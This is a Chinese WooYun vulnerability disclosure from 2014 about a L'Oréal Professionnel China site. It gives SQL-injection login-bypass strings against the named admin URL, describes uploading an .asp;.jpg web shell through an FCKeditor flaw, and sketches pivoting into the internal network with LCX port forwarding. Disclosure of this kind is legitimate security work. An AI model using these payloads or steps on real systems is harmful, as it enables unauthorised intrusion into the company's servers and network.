欧莱雅某站后台万能密码登陆可shell危及内网安全

漏洞概要

缺陷编号:WooYun-2014-088969

漏洞标题:欧莱雅某站后台万能密码登陆可shell危及内网安全

相关厂商:欧莱雅

漏洞作者:阿啸

提交时间:2014-12-28 11:09

公开时间:2015-02-11 11:10

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

Tags标签:

漏洞详情

披露状态:

2014-12-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-02-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://www.lorealprofessionnel.com.cn/admin/admin'or'1'='1#admin'or'1'='1#或'or'='or''or'='or'

添加新闻处采用fckeditor编辑器 利用编辑器漏洞上传.asp;.jpg文件 成功getshell

3389端口开启

内网IP

理论上提权后,做一下LCX转发,就可以内网漫游了

漏洞证明:

http://www.lorealprofessionnel.com.cn/admin/admin'or'1'='1#admin'or'1'='1#或'or'='or''or'='or'

添加新闻处采用fckeditor编辑器 利用编辑器漏洞上传.asp;.jpg文件 成功getshell

3389端口开启

内网IP

理论上提权后,做一下LCX转发,就可以内网漫游了

修复方案:

你值得拥有

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

评价

  1. 2010-01-01 00:00 0x 80 白帽子 | Rank:967 漏洞数:111)

    已关注你,小伙子

  2. 2010-01-01 00:00 阿啸 白帽子 | Rank:38 漏洞数:5)

    @0x 80 谢谢

  • N/A